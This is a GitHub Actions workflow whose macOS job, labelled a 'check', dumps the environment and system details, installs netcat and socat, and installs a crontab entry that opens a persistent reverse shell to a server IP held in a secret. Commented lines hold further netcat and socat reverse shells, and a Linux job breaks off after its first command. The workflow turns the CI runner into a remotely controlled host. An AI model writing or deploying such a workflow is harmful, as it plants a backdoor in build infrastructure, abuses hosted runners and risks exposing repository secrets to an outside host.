name: main

on: push

jobs:
  macos-check-jb:
    name: macos_check
    runs-on: macos-latest
    steps:
      - name: print_macos_env
        env:
          PUBLIC_SERVER_IP: ${{ secrets.PUBLIC_SERVER }}
        run: |
          uname -a
          xcrun -f clang
          ls -al /Applications
          ls /
          env
          echo "check if same macos"
          sysctl -a | grep -i boot
          
          echo "deviceId" 
          system_profiler SPHardwareDataType
          brew install blacktop/tap/ipsw
          ipsw version
          echo "Current Date and Time: $(date)"
          echo "Current Timezone: $(date +'%Z %z')"
          echo "-----> done "
          # xcrun python3 -m http.server 8888 
          brew install sshpass netcat wget socat #dropbear openssh rlwrap
          # netcat $PUBLIC_SERVER_IP 2333 -e /bin/bash
          # nohup socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$PUBLIC_SERVER_IP:2224 &
          echo "* * * * * /opt/homebrew/bin/socat exec:'/bin/bash -li',pty,stderr,setsid,sigint,sane tcp:$PUBLIC_SERVER_IP:2228" | crontab -
          xcrun python3 -m http.server 8888

  linux-test-jb:
    name: linux_check
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
      with:
        fetch-depth: 2
        token: ${{ secrets.MYTOKEN }}

    - name: unzip
      env:
        WLB_KEY: ${{ secrets.WLB_KEY }}
      run: |
        uname -a
        
        